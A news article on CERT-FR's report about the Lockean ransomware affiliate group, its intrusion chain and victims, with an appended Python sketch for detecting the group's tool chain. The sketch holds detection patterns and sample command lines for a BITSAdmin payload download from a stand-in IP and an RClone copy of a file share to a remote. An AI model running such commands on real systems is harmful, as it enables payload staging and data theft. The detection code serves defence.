CERT-France: Lockean ransomware group behind attacks on French companies
Catalin Cimpanu November 3, 2021

French cybersecurity officials have identified today for the first time a ransomware “affiliate group” that is responsible for a long list of attacks against French companies over the past two years.

Identified as Lockean, the group’s activities and modus operandi were detailed today in a comprehensive report published by France’s Computer Emergency Response Team (CERT-FR), a division of ANSSI, the country’s national cybersecurity agency.

According to French officials, the group has been active since June 2020 and “has a propensity to target French entities,” having been linked to attacks on at least seven French companies, such as transportation logistics firm Gefco, pharmaceutical groups Fareva and Pierre Fabre, and local newspaper Ouest-France.

Lockean operators used different ransomware strains

CERT-FR officials said the group would typically rent access to corporate networks that had been previously infected via Emotet phishing emails, where they would deploy the QakBot malware and later the CobaltStrike post-exploitation framework.

Lockean operators would then use tools like AdFind, BITSAdmin, and BloodHound to move laterally inside a network in order to expand their access and control over a company’s systems.

The group would then use the RClone utility to copy sensitive files from the victim network and then deploy a file-encrypting ransomware strain.
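As an added example (not code from CERT-FR’s report or from this article), the following Python sketch classifies constructed process-creation records against the tool chain described above and flags hosts where discovery activity is followed by an RClone copy. The host names, file paths, job names and remote name are made up for the sample.

```python
"""Detection sketch for the Lockean post-exploitation tool chain described
by CERT-FR: AdFind / BloodHound for discovery, BITSAdmin for transfers and
RClone for exfiltration. The events below are constructed sample
process-creation records, not real telemetry."""
import re
from collections import defaultdict

# Stage labels are this example's own; the CERT-FR report does not define them.
INDICATORS = [
    ("discovery", re.compile(r"\badfind(\.exe)?\b", re.I)),
    ("discovery", re.compile(r"\b(sharphound|bloodhound)\b", re.I)),
    ("transfer",  re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("exfil",     re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
]

def classify(cmdline):
    """Return the stage label for one command line, or None if no tool matches."""
    for stage, pattern in INDICATORS:
        if pattern.search(cmdline):
            return stage
    return None

def find_chains(events):
    """Group events by host (sorted by timestamp) and return the hosts on which
    a discovery tool was seen and an RClone copy followed later, the ordering
    CERT-FR describes for Lockean intrusions.
    events: iterable of (host, timestamp, cmdline) tuples, in any order."""
    per_host = defaultdict(list)
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        stage = classify(cmd)
        if stage:
            per_host[host].append(stage)
    hits = {}
    for host, stages in per_host.items():
        first_disc = next((i for i, s in enumerate(stages) if s == "discovery"), None)
        if first_disc is not None and "exfil" in stages[first_disc + 1:]:
            hits[host] = stages
    return hits

# Constructed sample telemetry (hypothetical hosts, paths, job and remote names).
SAMPLE_EVENTS = [
    ("ws02", 120, r"rclone.exe config"),  # no copy/sync/move verb: not an exfil hit
    ("ws01", 300, r"rclone.exe copy \\fs01\finance remote:bucket --transfers 8"),
    ("ws01", 160, r"bitsadmin.exe /transfer job1 /download http://203.0.113.5/c.bin C:\Temp\c.bin"),
    ("ws01", 100, r"C:\Windows\Temp\adfind.exe -f objectcategory=computer"),
    ("ws03", 130, r"C:\Program Files\Git\bin\git.exe fetch"),  # benign, ignored
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_EVENTS))
```

The events are deliberately listed out of order to show that the function sorts by timestamp before reconstructing the per-host sequence.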

Figures: Lockean attack chain and post-exploitation diagrams (Image: CERT-FR)

According to CERT-FR officials, who investigated several of these intrusions, the Lockean group used different ransomware strains across the years, such as DoppelPaymer, Maze, Egregor, REvil (Sodinokibi), and ProLock.

Figures: Lockean RaaS usage and victims diagrams (Image: CERT-FR)

Second ransomware affiliate group identified

Because Lockean used different ransomware strains, officials believe the group is what security researchers call a “ransomware affiliate,” a term that refers to criminal groups who sign up on Ransomware-as-a-Service (RaaS) platforms.

Through these platforms, affiliates gain access to ready-to-deploy ransomware strains, which they deploy on hacked networks, splitting successful ransom payments with the ransomware’s creators.

If victims refused to pay, data from these companies would be published on so-called “leak sites” operated by the RaaS platforms, where victims would often be listed in order to ramp up public pressure on the hacked companies.

Lockean is now the second ransomware affiliate group that has been publicly identified by law enforcement agencies after the FBI exposed the OnePercent group in August.

Catalin Cimpanu is a cybersecurity reporter for The Record. He previously worked at ZDNet and Bleeping Computer, where he became a well-known name in the industry for his constant scoops on new vulnerabilities, cyberattacks, and law enforcement actions against hackers.